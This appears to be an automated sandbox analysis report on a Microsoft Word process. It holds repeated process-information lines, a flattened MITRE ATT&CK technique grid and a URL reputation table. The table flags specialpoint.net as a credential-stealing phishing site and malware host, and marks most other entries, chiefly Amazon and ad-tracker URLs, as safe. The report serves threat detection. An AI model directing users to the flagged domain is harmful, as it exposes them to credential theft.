Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Process Injection
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Extra Window Memory Injection
Security Account Manager1
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://specialpoint.net/100%SlashNextCredential Stealing type: Phishing & Social Engineering
http://www.opensource.org/licenses/mit-license.php0%URL Reputationsafe
https://images-eu.ssl-images-amazon.com/images/I/31PW3lLCbrL.js?xcp0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/Associates/XCM_Manual_Top_deals_DQC_a70c6d45-b37b-4159-bdbe-6ce627caa9a7._SY116_CB613590867_.jpg0%Avira URL Cloudsafe
https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:M6RE43WFQNSF80R5MH23$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DM6RE43WFQNSF80R5MH23%26m%3D1%26sc%3Dcsa%3Asi%26si%3D529%26pc%3D4844%26at%3D4844%26t%3D1723469068780%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DM6RE43WFQNSF80R5MH23%26aftb%3D1%26lob%3D1:48440%Avira URL Cloudsafe
https://lm.serving-sys.com/lm/acs?json={%22GUID%22:%22e8a9b9f8-649a-4e3b-8b9b-bc659c4059fc%22,%22Time%22:%2220240812T132415.199747%22}&rtu=https://aax-eu.amazon-adsystem.com/s/ecm3?ex=sizmek&id=[%tp_UserID%]0%Avira URL Cloudsafe
http://tools.ietf.org/html/rfc23970%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/61-QN8EAREL._AC_UL225_SR225,160_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/UFG_AE/Prime/Combined_Learn_More_signup_en_AE.png0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/UFG_AE/Prime/Prime_quality-guaranteed_400x300_en_AE.png0%Avira URL Cloudsafe
https://www.amazon.ae/af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3JlZj1uYXZfbG9nbz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D0%Avira URL Cloudsafe
https://usersync.gumgum.com/usersync?b=amz&i=oaXwqW9BSkCEPaenhYbK_A&n=y&r=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DgumgumHMT&id=%5BUID%5D&gdpr_consent=0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213331_UAE_3151168_153x125_en_AE._SY116_CB428587699_.jpg0%Avira URL Cloudsafe
https://m.media-amazon.com/images/S/sash/Z8YwjOjqIHxqujG.png0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/412CLCbp2pL._SR240,220_.jpg0%Avira URL Cloudsafe
https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fld%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26ctb%3D1%26sc0%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb0%3D402%26pc0%3D4761%26ld0%3D4761%26t0%3D1723469078779%26csmtags%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:47610%Avira URL Cloudsafe
https://m.media-amazon.com/images/G/01/msa/vowels/metrics.jpg?time=1723469073783&rand=3824730%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/11Q6G8iTFZL.css?xcp0%Avira URL Cloudsafe
https://aax-eu.amazon.ae/e/xsp/imp?b=RFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk&pj=%7B%22measurementMethod%22%3A%22cod_client%22%7D0%Avira URL Cloudsafe
https://aax-eu.amazon-adsystem.com/s/ecm3?ex=index&id=L-g7zBtD85twUg2lePzOAzc4dWg4ZgAC0%Avira URL Cloudsafe
about:blank0%Avira URL Cloudsafe
https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:99EW8DTCPK04PDBCDQEK$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D99EW8DTCPK04PDBCDQEK%26ic%3D2%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D1321%26pc%3D5709%26at%3D5709%26t%3D1723469093786%26pty%3DFreshMerchandisedContent%26spty%3Dlearn-more%26pti%3Dlearn-more%26tid%3D99EW8DTCPK04PDBCDQEK%26aftb%3D1%26lob%3D1:57080%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpg0%Avira URL Cloudsafe
https://www.amazon.in0%Avira URL Cloudsafe
https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D7461%26at%3D7461%26t%3D1723469074827%26csmtags%3DendVL%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:74610%Avira URL Cloudsafe
https://www.facebook.com/fr/r.php?p=558293300959460&e=NMc_00QDRY2_1zWXHDYw0g&r=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dfbca%26id%3DNMc_00QDRY2_1zWXHDYw0g&s=1723469050&h=ZkZ2TFNLQWpzOHlRK2o3NWybuaMasXff9ycQxOAr7N9KYHff0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/813rUU6R6uL._AC_UL225_SR225,160_.jpg0%Avira URL Cloudsafe
https://cm.g.doubleclick.net/pixel?google_nid=a9eu&google_cm=&ex=doubleclick.net&gdpr_consent=&google_tc=0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763848_372x232_2X_en_AE._SY116_CB558609315_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/015J73ZDjpL.js?xcp0%Avira URL Cloudsafe
https://unagi-na.amazon.com/1/events/com.amazon.csm.nexusclient.gamma0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/718G151Go9L._AC_SY200_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1740513_3911856_186x116_1X_en_AE._SY116_CB566464918_.jpg0%Avira URL Cloudsafe
https://www.amazon.it0%Avira URL Cloudsafe
https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26m%3D1%26sc%3Dcsa%3Asi%26si%3D3567%26pc%3D7461%26at%3D7461%26t%3D1723469074827%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:74610%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/61OaibCCrKL._AC_SY200_.jpg0%Avira URL Cloudsafe
https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D2554%26pc%3D16655%26at%3D16655%26t%3D1723469060977%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:166550%Avira URL Cloudsafe
https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26ctb%3D1%26sc0%3DjQueryWindowLoad%26cf0%3D16617%26pc0%3D16617%26ld0%3D16617%26t0%3D1723469060939%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:166170%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/01/msa/vowels/metrics.jpg?time=1723469098777&rand=3464220%Avira URL Cloudsafe
https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D2078%26pc%3D16650%26at%3D16650%26t%3D1723469060972%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:166500%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/81ZqHezuUOL._AC_UL450_SR450,320_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/61P62lC5OHL._AC_UL225_SR225,160_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/617GtbtSffL._AC_UL450_SR450,320_.jpg0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/31+4pNVeyCL._SR480,440_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/11Hy-4jiUaL.css?xcp0%Avira URL Cloudsafe
https://cookie-matching.mediarithmics.com/input?key=GOO&key=GOO&action=GET_ID&opid=goo&etid=&domid=1106&ops=apx&google_gid=CAESEHd7TnmxVBefiCYYRMqSbzw&google_cver=10%Avira URL Cloudsafe
https://www.amazon.ae/rd/uedata?rid=99EW8DTCPK04PDBCDQEK&sid=262-5692979-3003613&rx=zeSr6zbHsQh3b0mOv5A96g0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/Associates/XCM_Manual_Coupons_DQC_44b7c125-ee97-441e-9257-50452eb12b8c._SY116_CB613590867_.jpg0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/31Id2i6D-rL._SR240,220_.jpg0%Avira URL Cloudsafe
https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26m%3D1%26sc%3Dcsa%3AbrowserQuiteFn%26pc%3D16604%26at%3D16604%26t%3D1723469060926%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-06%7CmutObsYes%7Cnavbar%7CgwCFImgNoCache%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7Cadblk_no%7CperfYes%7Ccf_cdn_fr%7Ccf_cdn_mp%7CmutObsActive%7Caui%3Acss%3Anetwork%7Caui%3Ajs%3Acache%7CfourColumn%7CthreeColumnRevised%7CflexLayout%7CcssGridLayout%7Cadrender%3Ab73e766d-3a78-4209-bde9-93efa566562d%7Cadrender%3AGateway%3Aright-7%3Adesktop%7Cadrender%3Asafeframe%3Ab73e766d-3a78-4209-bde9-93efa566562d%7Cadrender%3Asafeframe%3AGateway%3Aright-7%3Adesktop%7Cadrender%3Ab73e766d-3a78-4209-bde9-93efa566562d%3Acreativetemplatename%3Aimage%7Cadrender%3AGateway%3Aright-7%3Adesktop%3Acreativetemplatename%3Aimage%7Cadrender%3Ab73e766d-3a78-4209-bde9-93efa566562d%3Acreativeid%3A579371395698106697%7Cadrender%3AGateway%3Aright-7%3Adesktop%3Acreativeid%3A579371395698106697%7Cadrender%3Ab73e766d-3a78-4209-bde9-93efa566562d%3Aprogramid%3A1001%7Cadrender%3AGateway%3Aright-7%3Adesktop%3Aprogramid%3A1001%7Ccsm-feature-touch-enabled%3Afalse%7Caui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%7CbrowserQuiteFn%26viz%3Dvisible%3A11%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:166040%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/51B00IVUMIL._AC_UL450_SR450,320_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/01DM-rg61+L.js?AUIClients/F3CollapsedCartAssets0%Avira URL Cloudsafe
https://github.com/mozilla/source-map/issues/300%Avira URL Cloudsafe
https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D776%26pc%3D27642%26at%3D27642%26t%3D1723469122091%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:276420%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986225_UAE_Budget_Store_AE_xsite_home_en_400x400_2X._CB644457597_.jpg0%Avira URL Cloudsafe
https://aax-eu.amazon.ae/e/xsp/imp?b=RLIYXr6sK-Tdry028JK9OgsAAAGRRsH9MgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCq3cNZ&pj=%7B%22measurementMethod%22%3A%22btr_client%22%7D0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcar_b07pcm7ds2_379x304_ae-en._SY116_CB623005780_.jpg0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/61czlYZjf2L._AC_SY200_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE._SY116_CB558011712_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x._SY116_CB659040198_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/61NFkX7td8L._AC_UL225_SR225,160_.jpg0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/61m4NR7APqL._AC_SY200_.jpg0%Avira URL Cloudsafe
https://specialpoint.net/cdn-cgi/challenge-platform/h/g/jsd/r/8b20c7739b2319b2100%Avira URL Cloudmalware
https://cm.g.doubleclick.net/pixel?google_nid=a9eu&google_hm=hNTQsyYhS2GGOCcWs3wFCQ&0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/51YnNha37vL._SX1500_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Wearables/Feb_Under199_1x._SY116_CB659039825_.jpg0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/71hpd10GGkL._SX3000_.jpg0%Avira URL Cloudsafe
